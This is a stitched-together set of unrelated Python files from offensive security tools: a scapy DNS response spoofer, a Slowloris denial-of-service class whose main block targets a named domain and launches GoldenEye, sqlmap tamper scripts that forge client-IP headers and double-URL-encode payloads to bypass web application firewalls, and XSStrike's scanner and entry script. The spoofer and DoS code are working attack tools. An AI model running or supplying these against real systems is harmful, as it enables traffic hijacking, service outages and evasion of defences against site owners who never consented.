import netifaces
from scapy.all import sniff, IP, DNS, DNSRR, send, UDP


class DNSSpoofer:
    def __init__(self, interface, spoofing_rules):
        self.interface = interface
        self.spoofing_rules = spoofing_rules

    def _get_mac_address(self):
        mac_address = netifaces.ifaddresses(self.interface)[netifaces.AF_LINK][0][
            "addr"
        ]
        return mac_address

    def _dns_responder(self, packet):
        # Only process DNS requests
        if packet.haslayer(DNS) and packet[DNS].qr == 0:
            queried_host = packet[DNS].qd.qname.decode("utf-8")
            if queried_host in self.spoofing_rules.keys():
                spoofed_packet = (
                    IP(dst=packet[IP].src, src=packet[IP].dst)
                    / UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)
                    / DNS(
                        id=packet[DNS].id,
                        qr=1,
                        aa=1,
                        qd=packet[DNS].qd,
                        an=DNSRR(
                            rrname=packet[DNS].qd.qname,
                            rdata=self.spoofing_rules[queried_host],
                        ),
                    )
                )
                send(spoofed_packet)
                print(
                    f"Spoofed DNS Response Sent: {queried_host} ->"
                    f" {self.spoofing_rules[queried_host]}"
                )

    def start(self):
        print("Starting DNS Spoofer...")
        sniff(iface=self.interface, filter="udp port 53", prn=self._dns_responder)



import re
import json
import hashlib

from core.colors import green, end
from core.requester import requester
from core.utils import deJSON, js_extractor, handle_anchor, getVar, updateVar
from core.log import setup_logger

logger = setup_logger(__name__)


def is_defined(o):
    return o is not None


def scan(data, extractor, definitions, matcher=None):
    matcher = matcher or _simple_match
    detected = []
    for component in definitions:
        extractors = definitions[component].get("extractors", None).get(extractor, None)
        if not is_defined(extractors):
            continue
        for i in extractors:
            match = matcher(i, data)
            if match:
                detected.append(
                    {"version": match, "component": component, "detection": extractor}
                )
    return detected


def _simple_match(regex, data):
    regex = deJSON(regex)
    match = re.search(regex, data)
    return match.group(1) if match else None


def _replacement_match(regex, data):
    try:
        regex = deJSON(regex)
        group_parts_of_regex = r"^\/(.*[^\\])\/([^\/]+)\/$"
        ar = re.search(group_parts_of_regex, regex)
        search_for_regex = "(" + ar.group(1) + ")"
        match = re.search(search_for_regex, data)
        ver = None
        if match:
            ver = re.sub(ar.group(1), ar.group(2), match.group(0))
            return ver

        return None
    except:
        return None


def _scanhash(hash, definitions):
    for component in definitions:
        hashes = definitions[component].get("extractors", None).get("hashes", None)
        if not is_defined(hashes):
            continue
        for i in hashes:
            if i == hash:
                return [
                    {"version": hashes[i], "component": component, "detection": "hash"}
                ]

    return []


def check(results, definitions):
    for r in results:
        result = r

        if not is_defined(definitions[result.get("component", None)]):
            continue
        vulns = definitions[result.get("component", None)].get("vulnerabilities", None)
        for i in range(len(vulns)):
            if not _is_at_or_above(
                result.get("version", None), vulns[i].get("below", None)
            ):
                if is_defined(vulns[i].get("atOrAbove", None)) and not _is_at_or_above(
                    result.get("version", None), vulns[i].get("atOrAbove", None)
                ):
                    continue

                vulnerability = {"info": vulns[i].get("info", None)}
                if vulns[i].get("severity", None):
                    vulnerability["severity"] = vulns[i].get("severity", None)

                if vulns[i].get("identifiers", None):
                    vulnerability["identifiers"] = vulns[i].get("identifiers", None)

                result["vulnerabilities"] = result.get("vulnerabilities", None) or []
                result["vulnerabilities"].append(vulnerability)

    return results


def unique(ar):
    return list(set(ar))


def _is_at_or_above(version1, version2):
    # print "[",version1,",", version2,"]"
    v1 = re.split(r"[.-]", version1)
    v2 = re.split(r"[.-]", version2)

    l = len(v1) if len(v1) > len(v2) else len(v2)
    for i in range(l):
        v1_c = _to_comparable(v1[i] if len(v1) > i else None)
        v2_c = _to_comparable(v2[i] if len(v2) > i else None)
        # print v1_c, "vs", v2_c
        if not isinstance(v1_c, type(v2_c)):
            return isinstance(v1_c, int)
        if v1_c > v2_c:
            return True
        if v1_c < v2_c:
            return False

    return True


def _to_comparable(n):
    if not is_defined(n):
        return 0
    if re.search(r"^[0-9]+$", n):
        return int(str(n), 10)

    return n


def _replace_version(jsRepoJsonAsText):
    return re.sub(r"[.0-9]*", "[0-9][0-9.a-z_\-]+", jsRepoJsonAsText)


def is_vulnerable(results):
    for r in results:
        if "vulnerabilities" in r:
            # print r
            return True

    return False


def scan_uri(uri, definitions):
    result = scan(uri, "uri", definitions)
    return check(result, definitions)


def scan_filename(fileName, definitions):
    result = scan(fileName, "filename", definitions)
    return check(result, definitions)


def scan_file_content(content, definitions):
    result = scan(content, "filecontent", definitions)
    if len(result) == 0:
        result = scan(content, "filecontentreplace", definitions, _replacement_match)

    if len(result) == 0:
        result = _scanhash(
            hashlib.sha1(content.encode("utf8")).hexdigest(), definitions
        )

    return check(result, definitions)


def main_scanner(uri, response):
    definitions = getVar("definitions")
    uri_scan_result = scan_uri(uri, definitions)
    filecontent = response
    filecontent_scan_result = scan_file_content(filecontent, definitions)
    uri_scan_result.extend(filecontent_scan_result)
    result = {}
    if uri_scan_result:
        result["component"] = uri_scan_result[0]["component"]
        result["version"] = uri_scan_result[0]["version"]
        result["vulnerabilities"] = []
        vulnerabilities = set()
        for i in uri_scan_result:
            try:
                for j in i["vulnerabilities"]:
                    vulnerabilities.add(str(j))
            except KeyError:
                pass
        for vulnerability in vulnerabilities:
            result["vulnerabilities"].append(
                json.loads(vulnerability.replace("'", '"'))
            )
        return result


def retireJs(url, response):
    scripts = js_extractor(response)
    for script in scripts:
        if script not in getVar("checkedScripts"):
            updateVar("checkedScripts", script, "add")
            uri = handle_anchor(url, script)
            response = requester(
                uri, "", getVar("headers"), True, getVar("delay"), getVar("timeout")
            ).text
            result = main_scanner(uri, response)
            if result:
                logger.red_line()
                logger.good(
                    "Vulnerable component: "
                    + result["component"]
                    + " v"
                    + result["version"]
                )
                logger.info("Component location: %s" % uri)
                details = result["vulnerabilities"]
                logger.info("Total vulnerabilities: %i" % len(details))
                for detail in details:
                    logger.info(
                        "%sSummary:%s %s"
                        % (green, end, detail["identifiers"]["summary"])
                    )
                    logger.info("Severity: %s" % detail["severity"])
                    logger.info("CVE: %s" % detail["identifiers"]["CVE"][0])
                logger.red_line()



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.convert import getText
from thirdparty.six.moves import urllib as _urllib


class MethodRequest(_urllib.request.Request):
    """Used to create HEAD/PUT/DELETE/...

    requests with urllib
    """

    def set_method(self, method):
        self.method = getText(
            method.upper()
        )  # Dirty hack for Python3 (may it rot in hell!)

    def get_method(self):
        return getattr(self, "method", _urllib.request.Request.get_method(self))



#!/usr/bin/env python
# This software released into the public domain. Anyone is free to copy,
# modify, publish, use, compile, sell, or distribute this software,
# either in source code form or as a compiled binary, for any purpose,
# commercial or non-commercial, and by any means.

import socket
import ctypes
import os


class sockaddr(ctypes.Structure):
    _fields_ = [
        ("sa_family", ctypes.c_short),
        ("__pad1", ctypes.c_ushort),
        ("ipv4_addr", ctypes.c_byte * 4),
        ("ipv6_addr", ctypes.c_byte * 16),
        ("__pad2", ctypes.c_ulong),
    ]


if hasattr(ctypes, "windll"):
    WSAStringToAddressA = ctypes.windll.ws2_32.WSAStringToAddressA
    WSAAddressToStringA = ctypes.windll.ws2_32.WSAAddressToStringA
else:

    def not_windows():
        raise SystemError("Invalid platform. ctypes.windll must be available.")

    WSAStringToAddressA = not_windows
    WSAAddressToStringA = not_windows


def inet_pton(address_family, ip_string):
    addr = sockaddr()
    addr.sa_family = address_family
    addr_size = ctypes.c_int(ctypes.sizeof(addr))

    if (
        WSAStringToAddressA(
            ip_string, address_family, None, ctypes.byref(addr), ctypes.byref(addr_size)
        )
        != 0
    ):
        raise socket.error(ctypes.FormatError())

    if address_family == socket.AF_INET:
        return ctypes.string_at(addr.ipv4_addr, 4)
    if address_family == socket.AF_INET6:
        return ctypes.string_at(addr.ipv6_addr, 16)

    raise socket.error("unknown address family")


def inet_ntop(address_family, packed_ip):
    addr = sockaddr()
    addr.sa_family = address_family
    addr_size = ctypes.c_int(ctypes.sizeof(addr))
    ip_string = ctypes.create_string_buffer(128)
    ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string))

    if address_family == socket.AF_INET:
        if len(packed_ip) != ctypes.sizeof(addr.ipv4_addr):
            raise socket.error("packed IP wrong length for inet_ntoa")
        ctypes.memmove(addr.ipv4_addr, packed_ip, 4)
    elif address_family == socket.AF_INET6:
        if len(packed_ip) != ctypes.sizeof(addr.ipv6_addr):
            raise socket.error("packed IP wrong length for inet_ntoa")
        ctypes.memmove(addr.ipv6_addr, packed_ip, 16)
    else:
        raise socket.error("unknown address family")

    if (
        WSAAddressToStringA(
            ctypes.byref(addr), addr_size, None, ip_string, ctypes.byref(ip_string_size)
        )
        != 0
    ):
        raise socket.error(ctypes.FormatError())

    return ip_string[: ip_string_size.value - 1]


# Adding our two functions to the socket library
if os.name == "nt":
    socket.inet_pton = inet_pton
    socket.inet_ntop = inet_ntop



import socket
import random
import logging
import subprocess
from urllib.parse import urlparse
import os


logging.basicConfig(
    level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s"
)


class DoSAttack:
    def __init__(self):
        self.threads = []

    def send_line(self, s, line):
        line = f"{line}\r\n"
        s.send(line.encode("utf-8"))

    def send_header(self, s, name, value):
        self.send_line(s, f"{name}: {value}")

    def _get_ip(self, url):
        try:
            parsed_url = urlparse(url)
            if not parsed_url.netloc:
                parsed_url = urlparse("http://" + url)
            hostname = parsed_url.netloc
            return socket.gethostbyname(hostname)
        except Exception as e:
            return f"Error: {e}"

    def _is_ip(self, address):
        try:
            socket.inet_aton(address)
            return True
        except socket.error:
            return False

    def slowloris_attack(self, target, target_port, num_connections=100):
        def read_user_agents(file_name):
            user_agents = []
            with open(file_name, "r") as file:
                for line in file:
                    user_agents.append(line.strip())
            return user_agents

        path = os.path.join(os.path.dirname(__file__), "data/useragents.txt")
        user_agents = read_user_agents(path)
        list_of_sockets = []

        def init_socket(ip: str):
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(4)
            s.connect((ip, target_port))
            self.send_line(s, f"GET /?{random.randint(0, 2000)} HTTP/1.1")
            ua = random.choice(user_agents)
            self.send_header(s, "User-Agent", ua)
            self.send_header(s, "Accept-language", "en-US,en,q=0.5")
            return s

        def slowloris_iteration(self):
            logging.info("Sending keep-alive headers...")
            logging.info("Socket count: %s", len(list_of_sockets))

            # Try to send a header line to each socket
            for s in list(list_of_sockets):
                try:
                    self.send_header(s, "X-a", random.randint(1, 5000))
                except socket.error:
                    list_of_sockets.remove(s)

            # Some of the sockets may have been closed due to errors or timeouts.
            # Re-create new sockets to replace them until we reach the desired number.

            diff = num_connections - len(list_of_sockets)
            if diff <= 0:
                return

            logging.info("Creating %s new sockets...", diff)
            for _ in range(diff):
                try:
                    if not self._is_ip(target):
                        target = self._get_ip(target)
                        if "Error" in target:
                            logging.error(f"Invalid target: {target}")
                            return

                    ip = target
                    s = init_socket(ip)
                    if not s:
                        continue
                    list_of_sockets.append(s)
                except socket.error as e:
                    logging.debug("Failed to create new socket: %s", e)
                    break

        if not self._is_ip(target):
            target = self._get_ip(target)
            if "Error" in target:
                logging.error(f"Invalid target: {target}")
                return

        ip = target
        socket_count = num_connections
        logging.info("Attacking %s with %s sockets.", ip, socket_count)
        for _ in range(socket_count):
            try:
                logging.debug("Creating socket nr %s", _)
                s = init_socket(ip)
            except socket.error as e:
                logging.debug(e)
                break
            list_of_sockets.append(s)

        while True:
            try:
                slowloris_iteration()
            except (KeyboardInterrupt, SystemExit):
                logging.info("Stopping Slowloris")
                break
            except Exception as e:
                logging.debug("Error in Slowloris iteration: %s", e)

    def slowhttptest_attack(self):
        raise NotImplementedError

    def hulk_attack(self):
        raise NotImplementedError

    def goldeneye_attack(
        self,
        url,
        user_agents=None,
        workers=10,
        sockets=500,
        method="get",
        nosslcheck=True,
    ):
        logging.info("Attacking %s with GoldenEye...", url)
        path = os.path.join(os.path.dirname(__file__), "DOS/goldeneye.py")
        command = [
            "python3",
            path,
            url,
            "-u" if user_agents else "",
            str(user_agents) if user_agents else "",
            "-w",
            str(workers),
            "-s",
            str(sockets),
            "-m",
            method,
            "-n",
            str(nosslcheck),
        ]
        print(" ".join(command))
        subprocess.run(command)


if __name__ == "__main__":
    dos = DoSAttack()  # target_url, num_connections, attack_type
    dos.slowloris_attack(url="https://panthon.app", target_port=80, num_connections=100)
    dos.goldeneye_attack(url="https://panthon.app")



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import random

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def randomIP():
    octets = []

    while not octets or octets[0] in (10, 172, 192):
        octets = random.sample(xrange(1, 255), 4)

    return ".".join(str(_) for _ in octets)


def tamper(payload, **kwargs):
    """Append a fake HTTP header 'X-Forwarded-For' (and alike)"""

    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()
    headers["CF-Connecting-IP"] = randomIP()
    headers["True-Client-IP"] = randomIP()

    # Reference: https://developer.chrome.com/multidevice/data-compression-for-isps#proxy-connection
    headers["Via"] = "1.1 Chrome-Compression-Proxy"

    # Reference: https://wordpress.org/support/topic/blocked-country-gaining-access-via-cloudflare/#post-9812007
    headers["CF-IPCountry"] = random.sample(
        (
            "GB",
            "US",
            "FR",
            "AU",
            "CA",
            "NZ",
            "BE",
            "DK",
            "FI",
            "IE",
            "AT",
            "IT",
            "LU",
            "NL",
            "NO",
            "PT",
            "SE",
            "ES",
            "CH",
        ),
        1,
    )[0]

    return payload



#!/usr/bin/env python3

from __future__ import print_function

from core.colors import end, red, white, bad, info


try:
    import concurrent.futures
    from urllib.parse import urlparse

    try:
        import fuzzywuzzy
    except ImportError:
        import os

        print("%s fuzzywuzzy isn't installed, installing now." % info)
        ret_code = os.system("pip3 install fuzzywuzzy")
        if ret_code != 0:
            print("%s fuzzywuzzy installation failed." % bad)
            quit()
        print("%s fuzzywuzzy has been installed, restart XSStrike." % info)
        quit()
except ImportError:  # throws error in python2
    print(
        "%s XSStrike isn't compatible with python2.\n Use python > 3.4 to run XSStrike."
        % bad
    )
    quit()

# Let's import whatever we need from standard lib
import sys
import json
import argparse

# ... and configurations core lib
import core.config
import core.log

# Processing command line arguments, where dest var names will be mapped to local vars with the same name
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="url", dest="target")
parser.add_argument("--data", help="post data", dest="paramData")
parser.add_argument("-e", "--encode", help="encode payloads", dest="encode")
parser.add_argument("--fuzzer", help="fuzzer", dest="fuzz", action="store_true")
parser.add_argument("--update", help="update", dest="update", action="store_true")
parser.add_argument(
    "--timeout", help="timeout", dest="timeout", type=int, default=core.config.timeout
)
parser.add_argument(
    "--proxy", help="use prox(y|ies)", dest="proxy", action="store_true"
)
parser.add_argument("--crawl", help="crawl", dest="recursive", action="store_true")
parser.add_argument(
    "--json", help="treat post data as json", dest="jsonData", action="store_true"
)
parser.add_argument(
    "--path", help="inject payloads in the path", dest="path", action="store_true"
)
parser.add_argument(
    "--seeds", help="load crawling seeds from a file", dest="args_seeds"
)
parser.add_argument("-f", "--file", help="load payloads from a file", dest="args_file")
parser.add_argument(
    "-l", "--level", help="level of crawling", dest="level", type=int, default=2
)
parser.add_argument(
    "--headers", help="add headers", dest="add_headers", nargs="?", const=True
)
parser.add_argument(
    "-t",
    "--threads",
    help="number of threads",
    dest="threadCount",
    type=int,
    default=core.config.threadCount,
)
parser.add_argument(
    "-d",
    "--delay",
    help="delay between requests",
    dest="delay",
    type=int,
    default=core.config.delay,
)
parser.add_argument(
    "--skip", help="don't ask to continue", dest="skip", action="store_true"
)
parser.add_argument(
    "--skip-dom", help="skip dom checking", dest="skipDOM", action="store_true"
)
parser.add_argument(
    "--blind",
    help="inject blind XSS payload while crawling",
    dest="blindXSS",
    action="store_true",
)
parser.add_argument(
    "--console-log-level",
    help="Console logging level",
    dest="console_log_level",
    default=core.log.console_log_level,
    choices=core.log.log_config.keys(),
)
parser.add_argument(
    "--file-log-level",
    help="File logging level",
    dest="file_log_level",
    choices=core.log.log_config.keys(),
    default=None,
)
parser.add_argument(
    "--log-file",
    help="Name of the file to log",
    dest="log_file",
    default=core.log.log_file,
)
args = parser.parse_args()

# Pull all parameter values of dict from argparse namespace into local variables of name == key
# The following works, but the static checkers are too static ;-) locals().update(vars(args))
target = args.target
path = args.path
jsonData = args.jsonData
paramData = args.paramData
encode = args.encode
fuzz = args.fuzz
update = args.update
timeout = args.timeout
proxy = args.proxy
recursive = args.recursive
args_file = args.args_file
args_seeds = args.args_seeds
level = args.level
add_headers = args.add_headers
threadCount = args.threadCount
delay = args.delay
skip = args.skip
skipDOM = args.skipDOM
blindXSS = args.blindXSS
core.log.console_log_level = args.console_log_level
core.log.file_log_level = args.file_log_level
core.log.log_file = args.log_file

logger = core.log.setup_logger()

core.config.globalVariables = vars(args)

# Import everything else required from core lib
from core.config import blindPayload
from core.encoders import base64
from core.photon import photon
from core.prompt import prompt
from core.updater import updater
from core.utils import extractHeaders, reader, converter

from modes.bruteforcer import bruteforcer
from modes.crawl import crawl
from modes.scan import scan
from modes.singleFuzz import singleFuzz

if type(args.add_headers) == bool:
    headers = extractHeaders(prompt())
elif type(args.add_headers) == str:
    headers = extractHeaders(args.add_headers)
else:
    from core.config import headers

core.config.globalVariables["headers"] = headers
core.config.globalVariables["checkedScripts"] = set()
core.config.globalVariables["checkedForms"] = {}
core.config.globalVariables["definitions"] = json.loads(
    "\n".join(reader(sys.path[0] + "/db/definitions.json"))
)

if path:
    paramData = converter(target, target)
elif jsonData:
    headers["Content-type"] = "application/json"
    paramData = converter(paramData)

if args_file:
    if args_file == "default":
        payloadList = core.config.payloads
    else:
        payloadList = list(filter(None, reader(args_file)))

seedList = []
if args_seeds:
    seedList = list(filter(None, reader(args_seeds)))

encoding = base64 if encode and encode == "base64" else False

if not proxy:
    core.config.proxies = {}

if update:  # if the user has supplied --update argument
    updater()
    quit()  # quitting because files have been changed

if not target and not args_seeds:  # if the user hasn't supplied a url
    logger.no_format("\n" + parser.format_help().lower())
    quit()

if fuzz:
    singleFuzz(target, paramData, encoding, headers, delay, timeout)
elif not recursive and not args_seeds:
    if args_file:
        bruteforcer(target, paramData, payloadList, encoding, headers, delay, timeout)
    else:
        scan(target, paramData, encoding, headers, delay, timeout, skipDOM, skip)
else:
    if target:
        seedList.append(target)
    for target in seedList:
        logger.run("Crawling the target")
        scheme = urlparse(target).scheme
        logger.debug("Target scheme: {}".format(scheme))
        host = urlparse(target).netloc
        main_url = scheme + "://" + host
        crawlingResult = photon(
            target, headers, level, threadCount, delay, timeout, skipDOM
        )
        forms = crawlingResult[0]
        domURLs = list(crawlingResult[1])
        difference = abs(len(domURLs) - len(forms))
        if len(domURLs) > len(forms):
            for i in range(difference):
                forms.append(0)
        elif len(forms) > len(domURLs):
            for i in range(difference):
                domURLs.append(0)
        threadpool = concurrent.futures.ThreadPoolExecutor(max_workers=threadCount)
        futures = (
            threadpool.submit(
                crawl,
                scheme,
                host,
                main_url,
                form,
                blindXSS,
                blindPayload,
                headers,
                delay,
                timeout,
                encoding,
            )
            for form, domURL in zip(forms, domURLs)
        )
        for i, _ in enumerate(concurrent.futures.as_completed(futures)):
            if i + 1 == len(forms) or (i + 1) % threadCount == 0:
                logger.info("Progress: %i/%i\r" % (i + 1, len(forms)))
        logger.no_format("")



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import string

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Double URL-encodes all characters in a given payload (not processing
    already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)

    Notes:
        * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset

    >>> tamper('SELECT FIELD FROM%20TABLE')
    '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
    """

    retVal = payload

    if payload:
        retVal = ""
        i = 0

        while i < len(payload):
            if (
                payload[i] == "%"
                and (i < len(payload) - 2)
                and payload[i + 1 : i + 2] in string.hexdigits
                and payload[i + 2 : i + 3] in string.hexdigits
            ):
                retVal += "%%25%s" % payload[i + 1 : i + 3]
                i += 3
            else:
                retVal += "%%25%.2X" % ord(payload[i])
                i += 1

    return retVal
